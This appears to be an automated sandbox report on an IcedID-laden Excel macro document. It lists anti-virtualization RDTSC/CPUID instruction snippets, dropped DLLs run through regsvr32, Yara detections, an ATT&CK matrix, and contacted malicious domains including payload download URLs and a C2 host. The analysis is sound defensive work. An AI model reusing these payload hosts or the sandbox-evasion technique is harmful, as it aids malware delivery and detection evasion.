        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000020D1E71 second address: 00000000020D1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000020D1EAB second address: 00000000020D1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000000131E71 second address: 0000000000131E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000000131EAB second address: 0000000000131EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_020D2434 rdtsc 3_2_020D2434
        Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,3_2_020D27BC
        Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,4_2_001327BC
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
        Source: regsvr32.exe, 00000005.00000002.2118001022.0000000002901000.00000004.00000001.sdmpBinary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpBinary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpBinary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
        Source: regsvr32.exe, 00000004.00000003.2108352068.00000000030C4000.00000004.00000001.sdmpBinary or memory string: Migrate and extend VMware environments to the AWS Cloud
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpBinary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
        Source: regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_020D2434 rdtsc 3_2_020D2434

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.21.37.209 80Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeDomain query: astrocycle.download
        Source: C:\Windows\System32\regsvr32.exeDomain query: aws.amazon.com
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 13.224.92.73 187Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.67.213.115 80Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_020D22DC LookupAccountNameW,3_2_020D22DC

        Stealing of Sensitive Information:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2111724951.0000000000407000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2117952085.00000000028A4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2116809079.0000000000467000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2308, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3060, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1920, type: MEMORY

        Remote Access Functionality:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2111724951.0000000000407000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2117952085.00000000028A4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2116809079.0000000000467000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2308, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3060, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1920, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsExploitation for Client Execution43Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery211Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Regsvr321NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol124SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery22Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 444679 Sample: DeliveryConf535215.xlsm Startdate: 06/07/2021 Architecture: WINDOWS Score: 100 47 Found malware configuration 2->47 49 Document exploit detected (drops PE files) 2->49 51 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->51 53 6 other signatures 2->53 6 EXCEL.EXE 53 28 2->6         started        process3 dnsIp4 27 uppercilio.fun 104.21.55.83, 49169, 80 CLOUDFLARENETUS United States 6->27 29 voopeople.fun 172.67.194.117, 49168, 80 CLOUDFLARENETUS United States 6->29 31 thousandsyears.download 172.67.198.51, 49167, 80 CLOUDFLARENETUS United States 6->31 19 C:\Users\user\XZIBIT.dll, PE32+ 6->19 dropped 21 C:\Users\user\XTOWN.dll, PE32+ 6->21 dropped 23 C:\Users\user\XRAY.dll, PE32+ 6->23 dropped 25 3 other malicious files 6->25 dropped 55 Document exploit detected (creates forbidden files) 6->55 57 Document exploit detected (UrlDownloadToFile) 6->57 11 regsvr32.exe 4 6->11         started        15 regsvr32.exe 6->15         started        17 regsvr32.exe 6->17         started        file5 signatures6 process7 dnsIp8 33 astrocycle.download 172.67.213.115, 49171, 49173, 80 CLOUDFLARENETUS United States 11->33 35 dr49lng3n1n2s.cloudfront.net 13.224.92.73, 443, 49170, 49172 AMAZON-02US United States 11->35 43 2 other IPs or domains 11->43 59 System process connects to network (likely due to code injection or exploit) 11->59 61 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 37 tp.8e49140c2-frontier.amazon.com 15->37 39 aws.amazon.com 15->39 41 104.21.37.209, 49175, 80 CLOUDFLARENETUS United States 17->41 45 2 other IPs or domains 17->45 signatures9

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.buzzsprout.com;0%Avira URL Cloudsafe
        http://astrocycle.download/0%Avira URL Cloudsafe
        http://crl.sca1b.amazontrus0%Avira URL Cloudsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://uppercilio.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1V14NYAS7A06VC7HKS2ERX-Content-Ty0%Avira URL Cloudsafe
        https://prod-us-west-2.csp-report.marketing.aws.dev/submit0%Avira URL Cloudsafe
        http://thousandsyears.download/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        https://amazonwebservices.d2.sc.omtrdc.net0%Avira URL Cloudsafe
        https://calculator.wsstatic.com0%Avira URL Cloudsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        https://112-tzm-766.mktoutil.com0%Avira URL Cloudsafe
        https://download.stormacq.com/aws/podcast/0%Avira URL Cloudsafe
        http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
        astrocycle.download0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        uppercilio.fun
        		104.21.55.83
        		truefalse
          		unknown
          thousandsyears.download
          		172.67.198.51
          		truefalse
            		unknown
            voopeople.fun
            		172.67.194.117
            		truefalse
              		unknown
              astrocycle.download
              		172.67.213.115
              		truetrue
                		unknown
                dr49lng3n1n2s.cloudfront.net
                		13.224.92.73
                		truefalse
                  		high
                  aws.amazon.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://astrocycle.download/true
                    • Avira URL Cloud: safe
                    		unknown
                    http://uppercilio.fun/div/44376,8555986111.jpgfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://thousandsyears.download/div/44376,8555986111.jpgfalse
                    • Avira URL Cloud: safe
                    		unknown
                    astrocycle.downloadtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.linkedin.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                      		high
                      https://a0.awsstatic.com/libra/1.0.385/directoriesregsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                        		high
                        https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gifregsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                          		high
                          https://c0.b0.p.awsstatic.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                            		high
                            https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infregsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmpfalse
                              		high
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://api.regional-table.region-services.aws.a2z.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                		high
                                https://a0.awsstatic.com/libra/1.0.385/librastandardlibregsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                  		high
                                  https://aws.amazon.com/ar/regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                    		high
                                    https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-homregsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://a0.p.awsstatic.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                      		high
                                      https://aws.amazon.com/cn/?nc1=h_lsregsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                        		high
                                        https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=defaultregsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                          		high
                                          https://aws.amazon.com/ru/regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                            		high
                                            https://amazon.com/=regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpfalse
                                              		high
                                              https://www.buzzsprout.com;regsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowserregsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                		high
                                                https://i18n-string.us-west-2.prod.pricing.aws.a2z.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://aws.amazon.com/ru/?nc1=h_lsregsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://docs.aws.amazon.com/index.html?nc2=h_ql_docregsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://aws.amazon.com/ar/?nc1=h_lsregsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://amazon.com/.regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://p.adsymptotic.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://aws.amazon.com/th/regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://docs.aws.amazon.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.windows.com/pctv.regsvr32.exe, 00000003.00000002.2103466805.00000000031B0000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  https://aws.amazon.com/4nregsvr32.exe, 00000004.00000003.2106538777.00000000003EC000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://aws.amazon.com/marketplace/?nc2=h_moregsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://d2a6igt6jhaluh.cloudfront.netregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://crl.sca1b.amazontrusregsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106538777.00000000003EC000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://ocsp.sca1b.amazontrust.com06regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://console.aws.amazon.com/support/home/?nc2=h_ql_curegsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://dftu77xade0tc.cloudfront.netregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://aws.amazon.com/search/regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://aws.amazon.com/?nc2=h_lgregsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://ocsp.rootca1.amazontrust.com0:regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://console.aws.amazon.com/support/home/?nc1=f_drregsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://aws.amazon.com/vi/regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://crl.rootg2.amazontrust.com/rootg2.crl0regsvr32.exe, 00000003.00000002.2101923387.00000000002C0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109622600.00000000001A0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2116642334.00000000001A0000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://aws.amazon.com/tw/regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://aws.amazon.com/tr/?nc1=h_lsregsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://aws.amazon.com/fr/?nc1=h_lsregsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://d1fgizr415o1r6.cloudfront.netregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1V14NYAS7A06VC7HKS2ERX-Content-Tyregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://a0.awsstatic.com/libra-search/1.0.13/jsregsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://prod-us-west-2.csp-report.marketing.aws.dev/submitregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://f0.awsstatic.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000003.00000002.2101851829.00000000001FD000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2106693910.0000000000407000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://spot-bid-advisor.s3.amazonaws.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://aws.amazon.com/regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2111691413.00000000003E7000.00000004.00000020.sdmpfalse
                                                                                                      		high
                                                                                                      https://d3ctxlq1ktw2nl.cloudfront.netregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.pngregsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://aws.amazon.com/tw/?nc1=hregsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://amazonwebservices.d2.sc.omtrdc.netregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://aws.amazon.com/podcasts/aws-podcast/regsvr32.exe, 00000003.00000002.2102922360.0000000002B92000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://d1yyh5dhdgifnx.cloudfront.netregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://aws.amazon.com/jp/regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://d1hemuljm71t2j.cloudfront.netregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://a0.awsstatic.com/libra-css/css/1.0.382regsvr32.exe, 00000003.00000003.2098314338.0000000002B82000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113666221.0000000003046000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://view-stage.us-west-2.prod.pricing.aws.a2z.comregsvr32.exe, 00000004.00000003.2106480345.000000000303C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://calculator.wsstatic.comregsvr32.exe, 00000004.00000002.2113610800.0000000003030000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
